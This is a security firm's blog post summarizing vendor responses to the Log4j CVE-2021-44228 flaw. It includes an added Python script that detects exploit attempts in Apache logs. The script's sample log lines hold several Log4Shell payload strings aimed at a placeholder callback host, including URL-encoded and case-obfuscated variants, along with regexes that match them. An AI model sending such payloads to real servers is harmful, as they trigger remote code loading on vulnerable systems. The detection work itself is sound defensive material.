Apache Log4j CVE-2021-44228

London Security sent out some emails about this last week, but it is important to acknowledge that this threat is still out there and to provide a summary of various vendors' answers to the problem.  We have been following various security providers' responses and have summarized each here for you.  If there are additional questions, feel free to reach out to London Security Engineers - we would be happy to assist!

CrowdStrike

CrowdStrike KB Article

CrowdStrike does not require any updates to its products to cover this threat.  It recommends applying the updates for the affected Apache issues.

Sophos

Sophos KB Article

Sophos recommends the following, then lists mitigations for the vulnerabilities as well as the affected Sophos products:

While there are steps that customers can take to mitigate the vulnerability, the best fix is to upgrade to the patched version, already released by Apache in Log4j 2.15.0.

McAfee

McAfee KB Article

As of December 16th, 2021:

Added:

  • Endpoint Security mitigation measure leveraging 'Expert Rules' that trigger On-Demand Memory Scans to detect malicious LOG4J exploit behavior.
  • More IOC detections observed for in-the-wild payloads
  • A large addition to the product capabilities 'Detection and Response' section for ENS ExtraDAT and Exploit Rule coverage.
  • Over 40 hashes added to the hash table.
  • Two files: the raw TCL file containing the proper expert rule syntax, and the required ExtraDAT:
    • EXTRA.zip
    • Log4j_Expert_Rule_TCL.zip

Trend Micro

Trend KB Article

Trend discusses the issue and provides a tool to assist: a vulnerability tester for the issue.  They additionally recommend following the Apache upgrade guidelines and checking Apache logs for potential indicators of compromise.  They DO NOT appear to have a specific product patch for this issue as of December 16th.
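As a concrete illustration of the log check Trend recommends, here is an added example (not Trend's tool and not part of the original post) that scans Apache access-log lines for the Log4j lookup syntax `${jndi:...}`. Because exploit strings in the wild are often URL-encoded or wrapped in case-changing lookups such as `${lower:j}`, the script normalizes each line first and then looks for the `jndi` token; any other `${...}` lookup is reported at a lower severity so an analyst can review it. The log lines, IP addresses and hostnames below are constructed sample data, not real indicators.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache access-log lines (RFC 5737 test addresses,
# placeholder hostnames); not taken from any real incident.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example/a}"
203.0.113.9 - - [16/Dec/2021:10:01:09 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fb%7D HTTP/1.1" 200 12 "-" "curl/7.68.0"
203.0.113.11 - - [16/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://callback.example/c}"
203.0.113.13 - - [16/Dec/2021:10:01:15 +0000] "GET /price?total=${amount} HTTP/1.1" 200 80 "-" "Mozilla/5.0"
"""

# The token we ultimately want to see after normalization.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any Log4j-style lookup at all; worth a look even without 'jndi'.
ANY_LOOKUP_RE = re.compile(r"\$\{[^}]*\}")
# ${lower:x} / ${upper:x} only change letter case of x.
CASE_LOOKUP_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-x} evaluates to the default value x when the lookup fails.
DEFAULT_LOOKUP_RE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")


def normalize(value: str, rounds: int = 5) -> str:
    """Undo URL encoding and collapse the simple lookups that only change
    case or supply a default, so the literal 'jndi' token becomes visible.
    Repeats until the text stops changing (bounded by `rounds`)."""
    for _ in range(rounds):
        previous = value
        value = unquote(value)
        value = CASE_LOOKUP_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(),
            value,
        )
        value = DEFAULT_LOOKUP_RE.sub(lambda m: m.group(1), value)
        if value == previous:
            break
    return value


def classify(line: str) -> str:
    """Return 'jndi' for a JNDI lookup, 'lookup' for any other ${...}
    expression, or 'clean'."""
    text = normalize(line)
    if JNDI_RE.search(text):
        return "jndi"
    if ANY_LOOKUP_RE.search(text):
        return "lookup"
    return "clean"


def scan_log(text: str) -> list:
    """Scan a whole access log; return (line_number, client_ip, verdict)
    for every line that is not clean. The client IP is the first field of
    the Apache combined log format."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        verdict = classify(line)
        if verdict != "clean":
            client_ip = line.split(" ", 1)[0]
            findings.append((number, client_ip, verdict))
    return findings


if __name__ == "__main__":
    for number, client_ip, verdict in scan_log(SAMPLE_LOG):
        print(f"line {number}: {verdict:6} from {client_ip}")
```

Run against a real access log, a hit is only an indicator that someone tried the lookup string against the server; whether the request reached a vulnerable Log4j instance has to be confirmed from the application side (outbound LDAP/RMI connections, Java process behaviour), which is why the upgrade to the patched Apache release remains the actual fix.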

Sentinel One

Sentinel One KB Article

Their statement is simple, though they cover the threat in some detail.

"SentinelOne’s infrastructure, applications, products, and services aren’t vulnerable to the exploit. SentinelOne’s information technology, infrastructure, security, and cloud teams conducted a comprehensive assessment in accordance with our information security policies and procedures."

We at London Security are continuing to monitor this and are looking at other solutions and how they are responding.